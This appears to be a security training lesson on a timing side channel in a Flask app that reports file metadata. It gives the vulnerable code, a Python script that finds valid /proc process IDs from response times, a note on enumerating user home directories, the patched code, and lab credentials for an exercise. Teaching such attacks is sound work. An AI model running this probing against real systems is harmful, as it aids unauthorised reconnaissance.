Whitebox Attacks

Data Exfiltration via Response Timing

Even if a web application does not explicitly display the result of an operation, the response time can still leak information about the outcome of that operation. In this section, we will discuss how to exploit differences in response timing to infer information about the web application that can support further attacks.

Code Review - Identifying the Vulnerability

For this section, the client implemented a web application that provides information about the web server's local filesystem. Each system user receives credentials for the web application and can check meta-information about files owned by them. The root user is allowed to check information for all system files. For the engagement, the client provided us with credentials for the htb-stdnt user and the source code.

Before jumping into the code analysis, let us quickly look at the web application to get a feel for the application's functionality. After logging in, we can access the /filecheck route to check information about system files. Let us request a file path that we know is owned by our user htb-stdnt, for instance, our home directory at /home/htb-stdnt/:

On the other hand, if we request a path that we know is owned by another user, for instance, /root/, the web application displays an error:

Now that we have an overview of the web application's core functionality, let us look at the source code. Since the web application's primary purpose is to display meta-information about system files, let us focus our code analysis on this functionality, which is implemented in the get_file_details function and used in the /filecheck route:

# return fileowner, filesize (recursively), and number of subfiles (recursively)
def get_file_details(path):
    try:
        if not os.path.exists(path):
            return '', 0, 0

        # number of subfiles
        filecount = 0
        for root_dir, cur_dir, files in os.walk(path):
            filecount += len(files)

        # file size
        path = Path(path)
        filesize = sum(f.stat().st_size for f in path.glob('**/*') if f.is_file())

        # file owner
        owner = path.owner()

        return owner, filesize, filecount

    except:
        return '', 0, 0

<SNIP>

@app.route('/filecheck', methods=['GET'])
def filecheck():
    if not session.get('logged_in'):
        return redirect(url_for('index'))

    user = session.get('user')
    filepath = request.args.get('filepath')

    owner, filesize, filecount = get_file_details(filepath)

    if (user == 'root') or (user == owner):
        return render_template('filecheck.html', message="Success!", type="success", file=filepath, owner=owner, filesize=filesize, filecount=filecount)

    return render_template('filecheck.html', message="Access denied!", type="danger", file=filepath)

The function get_file_details returns early if the path provided does not exist on the filesystem. Otherwise, it calculates the number of subfiles if the provided path is a directory by recursively getting the number of files in each subfolder using the os.walk function. Additionally, it recursively computes the size of the file and all subfiles in case the path is a directory. Lastly, it returns the owner of the provided filepath as well.

Looking at the route for /filecheck, we can see that the filepath GET parameter is passed as input to the get_file_details function. However, the web application only displays the meta-information if we are logged in as the owner of the provided file or as the root user. This means our account htb-stdnt can only query meta-information for files owned by the system user htb-stdnt. At first glance, there seems to be no way to exfiltrate meta-information about files we do not own.

However, the check whether we own the file or directory specified in the filepath GET variable is implemented after the meta-information has already been collected by the get_file_details function. Since checking all subdirectories and subfiles recursively takes processing time, this potentially leaks whether the path provided in filepath is valid on the web server's filesystem, leading to information disclosure via response timing.
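The effect can be reproduced without the web application. The following is a minimal local sketch, not the client's code: count_files is a hypothetical stand-in for the expensive part of get_file_details, and the size of the temporary directory tree is arbitrary. It only illustrates that a non-existent path returns almost immediately, while an existing directory costs a recursive walk.

```python
import os
import tempfile
import time
from pathlib import Path


def count_files(path):
    """Hypothetical stand-in for get_file_details: early exit, then a recursive walk."""
    if not os.path.exists(path):
        return 0  # early return: almost no work is done
    return sum(len(files) for _, _, files in os.walk(path))


def timed(func, *args):
    """Return (result, elapsed seconds) for a single call."""
    start = time.perf_counter()
    result = func(*args)
    return result, time.perf_counter() - start


def build_tree(base, dirs=20, files_per_dir=20):
    """Create a small directory tree to walk (the sizes are arbitrary)."""
    for d in range(dirs):
        sub = Path(base) / f"dir{d}"
        sub.mkdir()
        for f in range(files_per_dir):
            (sub / f"file{f}.txt").write_text("x")


with tempfile.TemporaryDirectory() as tmp:
    build_tree(tmp)
    existing_count, existing_time = timed(count_files, tmp)
    missing_count, missing_time = timed(count_files, os.path.join(tmp, "does-not-exist"))

print(f"existing: {existing_count} files in {existing_time:.6f}s")
print(f"missing:  {missing_count} files in {missing_time:.6f}s")
```

On most systems the first measurement should be noticeably larger than the second, and the gap grows with the number of files and subdirectories below the requested path.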

Debugging the Application Locally

Let us test our assumption on a local version of the web application so that we can debug and fine-tune our exploit. We can run the web application locally using the same methodology as in the previous section. Keep in mind that we need to run the web application as root if we want to test files our system user cannot access.

To simplify the testing process, let us adjust the /filecheck endpoint by removing the need for authentication and fixing the user variable to any system user. This way, we do not have to deal with authentication or any database operations:

@app.route('/filecheck', methods=['GET'])
def filecheck():
    user = 'vautia'
    filepath = request.args.get('filepath')

    owner, filesize, filecount = get_file_details(filepath)

    if (user == 'root') or user == owner:
        return render_template('filecheck.html', message="Success!", type="success", file=filepath, owner=owner, filesize=filesize, filecount=filecount)

    return render_template('filecheck.html', message="Access denied!", type="danger", file=filepath)

Due to our changes, we can now access the /filecheck endpoint directly without any authentication:

GET /filecheck?filepath=/home/vautia/ HTTP/1.1
Host: 127.0.0.1:1337

As an example, let us request a filepath that we know exists and is owned by our user, for instance, our home folder, and keep an eye on the response time:

Next, let us request a filepath that exists but is not owned by our user, like /proc/:

In the bottom right corner, we can see the response time of more than 4s. If we request a filepath we know to be invalid, like /invalid/, the response time is much shorter:

That is because the get_file_details function exits early if the filepath is invalid. This gives us a way of leaking valid paths on the web server. Keep in mind that the function takes longer for valid paths only because it recursively steps through each subdirectory to determine file sizes and the number of files. If we request a single valid file, like /etc/passwd, the response time is similar to that of an invalid path because there are no subdirectories to check:

Thus, we cannot identify individual valid files on the filesystem with this method. We can only reliably detect directories that contain enough subdirectories and subfiles for the get_file_details function to step through, so that the processing time is high enough for us to notice the difference in response time.

Exploitation

Now that we understand the timing attack we can run against the web application, let us discuss interesting ways to use it. In Linux, each process has its own directory at /proc/<pid>, where pid is the process ID of the corresponding process. Since the timing attack allows us to determine if a directory exists on the filesystem, this gives us a way of determining valid process IDs. For instance, a valid process ID results in a higher response time than our baseline response time for invalid directories:

To enumerate valid process IDs on a bigger scale, let us modify our exploit script from the previous section:

import requests

URL = "http://172.17.0.2:1337/filecheck"
cookies = {"session": "eyJsb2dnZWRfaW4iOnRydWUsInVzZXIiOiJodGItc3RkbnQifQ.ZCh4Qw.Lv94ak_WPWEN8Idhwf7l-3a5MH4"}
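THRESHOLD_S = 0.003  # seconds; tune against known valid and invalid paths

# PIDs start at 1, so /proc/0/ never exists
for pid in range(1, 200):
    r = requests.get(URL, params={"filepath": f"/proc/{pid}/"}, cookies=cookies)

    # r.elapsed covers the time from sending the request until the response headers are parsed
    if r.elapsed.total_seconds() > THRESHOLD_S:
        print(f"Valid PID found: {pid}")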

Running the exploit script leaks valid process IDs:

$ python3 solver.py

Valid PID found: 1
Valid PID found: 158

Remember that this attack's reliability depends on the processing time the web application takes to compute the meta-information for the directory. Since the process directories generally do not contain many subdirectories, we must carefully fine-tune our threshold. We can use known valid and known invalid values for this fine-tuning process. Furthermore, the exploit is not entirely reliable, particularly if run over the public internet. Thus, we may need to run the exploit multiple times and keep only the results that appear consistently across runs, discarding the rest as false positives.
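The fine-tuning and the repeated runs can be sketched as two small helpers. This is one possible approach under stated assumptions, not the only way to do it: calibrate_threshold and confirmed_hits are hypothetical names, placing the threshold halfway between the two medians is a simple heuristic, and all sample timings and run results below are made up for illustration.

```python
from collections import Counter
from statistics import median


def calibrate_threshold(valid_times, invalid_times):
    """Place the threshold halfway between the medians of both sample sets."""
    return (median(valid_times) + median(invalid_times)) / 2


def confirmed_hits(runs, min_runs):
    """Keep only candidates that were reported in at least min_runs separate runs."""
    counts = Counter(pid for run in runs for pid in set(run))
    return sorted(pid for pid, n in counts.items() if n >= min_runs)


# Made-up response times in seconds for known valid and known invalid paths.
valid_samples = [0.0041, 0.0046, 0.0039, 0.0050]
invalid_samples = [0.0019, 0.0022, 0.0018, 0.0021]
threshold = calibrate_threshold(valid_samples, invalid_samples)

# Made-up results of three scan runs; PID 77 shows up only once.
runs = [[1, 158], [1, 77, 158], [1, 158]]
stable = confirmed_hits(runs, min_runs=2)

print(f"threshold: {threshold:.6f}s, confirmed PIDs: {stable}")
```

Using medians rather than means keeps a single slow outlier, such as a network hiccup, from shifting the threshold.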

Another way to exploit the vulnerability is to enumerate valid system users by probing for existing home directories in /home/. Since users tend to keep additional data in their home directories, the timing difference is larger and the exploit becomes more reliable.
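A minimal sketch of such a username enumeration could look as follows. Several parts are assumptions: measure and enumerate_users are hypothetical helpers, the standard library's urllib is used here instead of requests only to keep the sketch free of dependencies, and the candidate names would come from a wordlist of our choice. Taking the fastest of several samples per candidate is one way to dampen network jitter, since jitter only ever adds latency.

```python
import time
import urllib.parse
import urllib.request


def measure(url, filepath, cookie=None):
    """Time one GET request to the filecheck route (wall-clock seconds)."""
    query = urllib.parse.urlencode({"filepath": filepath})
    req = urllib.request.Request(f"{url}?{query}")
    if cookie:
        req.add_header("Cookie", f"session={cookie}")
    start = time.perf_counter()
    with urllib.request.urlopen(req) as resp:
        resp.read()
    return time.perf_counter() - start


def enumerate_users(candidates, timer, threshold, samples=3):
    """Return the candidates whose home directory appears to exist.

    timer is any callable that maps a file path to a response time in seconds.
    """
    found = []
    for name in candidates:
        # The fastest sample is the one least affected by jitter.
        fastest = min(timer(f"/home/{name}/") for _ in range(samples))
        if fastest > threshold:
            found.append(name)
    return found


# Example wiring (not executed here); URL, cookie value, and names are placeholders:
# users = enumerate_users(
#     ["alice", "bob"],
#     lambda path: measure("http://172.17.0.2:1337/filecheck", path, cookie="<session cookie>"),
#     threshold=0.003,
# )
```

Passing the timer in as a callable keeps the decision logic separate from the network code, so the threshold handling can be checked offline with fake timings before the script is pointed at the target.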

Prevention & Patching

Generally, preventing timing vulnerabilities is not easy, since we must consider every difference in processing time and what kind of information it might reveal to an attacker. In our case, we must perform the permission check before computing the file meta-information. The function can then return early if the user has insufficient permissions, and the web server can respond immediately. As a result, the response time for a path the user does not own no longer differs significantly from the response time for a path that does not exist.

We could implement this by adding a user argument to the get_file_details function and returning early in case of insufficient permissions:

# return fileowner, filesize (recursively), and number of subfiles (recursively)
def get_file_details(path, user):
    try:
        if not os.path.exists(path):
            return '', 0, 0

        # permission check (runs before any recursive work)
        path = Path(path)
        owner = path.owner()
        if (user != 'root') and (user != owner):
            return '', 0, 0

        # number of subfiles
        filecount = 0
        for root_dir, cur_dir, files in os.walk(path):
            filecount += len(files)

        # file size
        filesize = sum(f.stat().st_size for f in path.glob('**/*') if f.is_file())

        return owner, filesize, filecount

    except:
        return '', 0, 0
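Note that the /filecheck route then has to pass the session user as the second argument when it calls get_file_details. The following self-contained sketch restates the patched function in condensed form, with the bare except narrowed to Exception, and checks locally that a denied request and a non-existent path produce the same result. The user name no-such-user-for-demo is made up and is assumed not to own the temporary directory.

```python
import os
import tempfile
from pathlib import Path


def get_file_details(path, user):
    """Condensed restatement of the patched function: ownership is checked first."""
    try:
        if not os.path.exists(path):
            return '', 0, 0

        path = Path(path)
        owner = path.owner()
        if user != 'root' and user != owner:
            return '', 0, 0  # denied before the expensive walk starts

        filecount = sum(len(files) for _, _, files in os.walk(path))
        filesize = sum(f.stat().st_size for f in path.glob('**/*') if f.is_file())
        return owner, filesize, filecount
    except Exception:
        return '', 0, 0


with tempfile.TemporaryDirectory() as tmp:
    Path(tmp, "a.txt").write_text("hello")
    # Made-up user name that should not own the temporary directory.
    denied = get_file_details(tmp, "no-such-user-for-demo")
    missing = get_file_details(os.path.join(tmp, "missing"), "no-such-user-for-demo")
    as_root = get_file_details(tmp, "root")

print("denied: ", denied)
print("missing:", missing)
print("as root:", as_root)
```

Both the denied and the missing case return before any directory traversal, so the remaining difference between them is a single ownership lookup rather than a recursive walk.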

Questions
Authenticate with user "htb-stdnt" and password "Academy_student!"

Try to use what you learned in this section to enumerate a valid system username.


code_timing_data.zip
